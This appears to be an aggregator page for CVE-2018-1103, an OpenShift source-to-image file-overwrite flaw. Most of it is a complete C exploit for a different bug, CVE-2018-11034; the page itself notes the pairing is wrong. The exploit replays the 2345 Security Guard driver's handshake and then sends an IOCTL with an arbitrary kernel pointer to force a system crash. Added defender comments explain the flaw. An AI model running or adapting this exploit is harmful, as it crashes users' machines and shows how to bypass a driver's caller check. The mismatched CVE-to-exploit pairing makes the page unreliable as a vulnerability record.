CVE-2018-1103
CVSS: N/A
发布时间 :2018-06-12 11:29:00
修订时间 :2018-06-12 11:29:00

[原文]Openshift Enterprise source-to-image before version 1.1.10 is vulnerable to an improper validation of user input. An attacker who could trick a user into using the command to copy files locally, from a pod, could override files outside of the target directory of the command.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS暂不可用

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1103
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1103
(官方数据源) NVD

- 其它链接及资源

https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1103
(UNKNOWN)  CONFIRM  https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2018-1103

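- 漏洞信息 (F147609)

注:以下条目及利用代码标注的编号为 CVE-2018-11034(2345 安全卫士 2345NsProtect.sys 拒绝服务),与本页的 CVE-2018-1103(OpenShift source-to-image)并非同一漏洞,疑为编号前缀匹配造成的误关联。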

2345 Security Guard 3.7 2345NsProtect.sys Denial Of Service (PacketStormID:F147609)
2018-05-15 00:00:00
anhkgg  
exploit,denial of service
CVE-2018-11034

2345 Security Guard version 3.7 suffers from a denial of service vulnerability related to 2345NsProtect.sys.

# Exploit Title: [BSOD  by IOCTL 0x8000200D in 2345NsProtect.sys  of 2345 Security Guard 3.7]
# Date: [20180513]
# Exploit Author: [anhkgg]
# Vendor Homepage: [http://safe.2345.cc/]
# Software Link: [http://dl.2345.cc/2345pcsafe/2345pcsafe_v3.7.0.9345.exe]
# Version: [v3.7] (REQUIRED)
# Tested on: [Windows X64]
# CVE : [CVE-2018-11034]
 
#include <windows.h>
#include <stdio.h>
 
/* Request/response buffer used with IOCTL 0x222298 (passed as both input and output). */
struct NETFW_IOCTL_ADD_PID
{
    DWORD pid;              /* offset 0x00: caller sets this to its own process id */
    char seed[0x14];        /* offset 0x04: 20 bytes read back after the call and fed to calc_seed();
                               presumably filled in by the driver - confirm against the driver */
};/* total size 0x18 */
 
/* Request buffer used with IOCTL 0x2222A4. Field offsets below follow from the member sizes. */
struct NETFW_IOCTL_SET_PID
{
    BYTE set_state;         /* offset 0x00: set to 1 by the caller in this file */
    BYTE unk;               /* offset 0x01: meaning unknown; left zero */
    WORD buf_len;           /* offset 0x02: number of meaningful bytes in buf (26 here) */
    DWORD pid;              /* offset 0x04: caller's process id */
    char buf[0x64];         /* offset 0x08: receives the 26-byte value produced by calc_seed() */
};/* total size 0x6c */
 
/*
 * Request buffer used with IOCTL 0x222040: a raw pointer value plus a size,
 * both chosen entirely by the user-mode caller. A driver that receives a
 * pointer embedded in a buffer like this has to validate it before use.
 * Size of this struct depends on pointer width (x86 vs x64).
 */
struct NETFW_IOCTL_222040
{
    DWORD* ptr;             /* caller-supplied address */
    DWORD size;             /* caller-supplied length */
};
 
/*
 * Exchange the bytes at a1 and a2 using three XOR operations.
 *
 * Returns the byte left in *a2, i.e. the value *a1 held on entry when the
 * two pointers are distinct.
 *
 * When a1 == a2 the byte is cleared to 0 instead of being left unchanged
 * (the classic XOR-swap aliasing quirk). The callers in this file can pass
 * the same slot twice, so this quirk affects their output and must be kept
 * as-is. NOTE(review): the decompiler-style name suggests this mirrors a
 * routine in the driver - confirm before "fixing" the aliasing case.
 */
int __stdcall f_XOR__12A30(BYTE *a1, BYTE *a2)
{
    *a1 = (BYTE)(*a1 ^ *a2);
    *a2 = (BYTE)(*a2 ^ *a1);
    *a1 = (BYTE)(*a1 ^ *a2);
    return (unsigned __int8)*a2;
}
 
/*
 * Initialise a 256-entry permutation table from a key; the loop structure
 * matches the RC4 key-scheduling pattern, with the swap done by
 * f_XOR__12A30 (so a slot swapped with itself is zeroed).
 *
 * a1  - key bytes; len of them are read, cyclically.
 * len - key length; must be non-zero (it is used as a divisor).
 * a3  - output state; needs room for at least 258 bytes: 256 table entries
 *       followed by two running index bytes, both reset to 0 here.
 *
 * Returns (k + 1) / len from the last iteration; the caller in this file
 * ignores the value.
 */
int __stdcall sub_12A80(char *a1, int len, char *a3)
{
    unsigned __int8 key_pos = 0;
    unsigned __int8 mix = 0;
    int wrapped = 0;
    __int16 idx;

    /* Identity permutation, then clear the two index bytes kept after it. */
    for ( idx = 0; idx < 256; ++idx )
        a3[idx] = idx;
    a3[256] = 0;
    a3[257] = 0;

    idx = 0;
    while ( idx < 256 )
    {
        mix += a3[idx] + a1[key_pos];
        f_XOR__12A30((BYTE*)&a3[idx], (BYTE*)&a3[mix]);
        wrapped = (key_pos + 1) / len;
        key_pos = (key_pos + 1) % len;
        ++idx;
    }
    return wrapped;
}
 
/*
 * XOR len bytes of a1 in place with a keystream drawn from the state in a3;
 * the loop matches the RC4 output-generation pattern, again using
 * f_XOR__12A30 for the swap.
 *
 * a1  - buffer transformed in place.
 * len - number of bytes to process.
 * a3  - state prepared by sub_12A80: 256 table bytes, then the two running
 *       indices at a3[256] and a3[257], which are written back on exit so a
 *       later call continues the same stream.
 *
 * Returns a3.
 */
char *__stdcall sub_12B60(char *a1, signed int len, char *a3)
{
    unsigned __int8 x = a3[256];
    unsigned __int8 y = a3[257];
    __int16 pos = 0;

    while ( pos < len )
    {
        ++x;
        y += a3[x];
        f_XOR__12A30((BYTE*)&a3[x], (BYTE*)&a3[y]);
        a1[pos] ^= a3[(unsigned __int8)(a3[y] + a3[x])];
        ++pos;
    }

    /* Persist the indices alongside the table. */
    a3[256] = x;
    a3[257] = y;
    return a3;
}
 
/*
 * Derive the 26-byte value that is later sent in NETFW_IOCTL_SET_PID.buf.
 *
 * seed - 20-byte (0x14) key; read, not modified.
 * dst  - receives 26 bytes; must have room for them.
 *
 * A fixed 26-byte constant is transformed in place with the keystream
 * produced from seed (sub_12A80 builds the state, sub_12B60 applies it).
 * NOTE(review): a handshake built only from a constant embedded in the
 * client plus a value handed out to any caller gives the driver no real
 * assurance about who is calling - presumably this is the driver's caller
 * check; confirm against the driver.
 */
void calc_seed(char* seed, char* dst)
{
    /* Same 26 constants as the original element-by-element assignments. */
    char Source1[26] = {
         8, 14,  8, 10,  2,  3, 29, 23, 13,  3, 15, 22, 15,
         7, 91,  4, 18, 26, 26,  3,  4,  1, 15, 25, 10, 13
    };
    /* Scratch state: sub_12A80 needs 258 bytes, 300 are reserved. */
    char a3[300] = {0};

    sub_12A80(seed, 0x14, a3);
    sub_12B60(Source1, 0x1A, a3);
    memcpy(dst, Source1, 26);
}
 
/*
 * Proof of concept for the 2345NsProtect.sys denial of service described in
 * the advisory header above (labelled CVE-2018-11034 there).
 *
 * Opens the \\.\2345NetFirewall device and issues three IOCTLs in order:
 * 0x222298, 0x2222A4 and 0x222040. Returns 1 if the device cannot be
 * opened, otherwise 0 - including when an individual IOCTL fails, since
 * failures are only printed.
 *
 * Defender notes:
 *  - The final request embeds a raw pointer value and a size chosen by the
 *    user-mode caller. The advisory states the result is a bugcheck;
 *    presumably the driver uses that pointer without validating it. A
 *    driver accepting embedded user pointers needs to probe them
 *    (ProbeForRead/ProbeForWrite inside an exception handler) and bound
 *    the length before touching the memory.
 *  - The device is opened here by an ordinary process with read/write
 *    access; restricting the device object's ACL limits who can reach the
 *    IOCTL handlers at all.
 *  - Handle opens of \\.\2345NetFirewall by processes other than the
 *    vendor's own components are a reasonable thing to monitor for on
 *    hosts that still run the affected version.
 *
 * NOTE(review): the advisory title names IOCTL 0x8000200D, while the
 * request marked "BSOD" below uses 0x222040 - confirm which code the
 * advisory actually refers to.
 * NOTE(review): the handle h is never closed, and GetLastError() (a DWORD)
 * is printed with %d.
 */
int poc_2345NetFirewall()
{
    HANDLE h = CreateFileA("\\\\.\\2345NetFirewall",
        GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(h == INVALID_HANDLE_VALUE) {
        printf("[-] Open device error: %d\n", GetLastError());
        return 1;
    }
    DWORD BytesReturned = 0;
 
    /* Step 1: send the caller's pid; the same struct is the output buffer,
       and its seed field is consumed below. */
    DWORD ctlcode = 0x222298;
    NETFW_IOCTL_ADD_PID add_pid = {0};
    add_pid.pid = GetCurrentProcessId();
 
    if(!DeviceIoControl(h, ctlcode, &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &add_pid, sizeof(NETFW_IOCTL_ADD_PID), &BytesReturned, NULL)) {
        printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
    }
 
    /* Step 2: send back a 26-byte value derived from that seed, together
       with the pid and set_state = 1. */
    ctlcode = 0x2222A4;
    NETFW_IOCTL_SET_PID set_pid = {0};
    set_pid.pid = GetCurrentProcessId();
    set_pid.set_state = 1;
 
    calc_seed(add_pid.seed, set_pid.buf);
    set_pid.buf_len = 26;
 
    if(!DeviceIoControl(h, ctlcode, &set_pid, sizeof(NETFW_IOCTL_SET_PID), &set_pid, sizeof(NETFW_IOCTL_SET_PID), &BytesReturned, NULL)) {
        printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
    }
 
    /* Step 3: the request the author marks as causing the bugcheck. The
       buffer carries a caller-chosen address and size. */
    //BSOD
    ctlcode = 0x222040;
    NETFW_IOCTL_222040 buf_222040 = {0};
    buf_222040.size = 1;
    buf_222040.ptr = (DWORD*)0x80000000;
    if(!DeviceIoControl(h, ctlcode, &buf_222040, sizeof(NETFW_IOCTL_222040), &buf_222040, sizeof(NETFW_IOCTL_222040), &BytesReturned, NULL)) {
        printf("[-] DeviceIoControl %x error: %d\n", ctlcode, GetLastError());
    }
 
    return 0;
}
 
/* Entry point: runs the proof of concept once. The PoC's status code is
   discarded, so the process exit code is always 0. */
int main()
{
    (void)poc_2345NetFirewall();
    return 0;
}

    
 

 
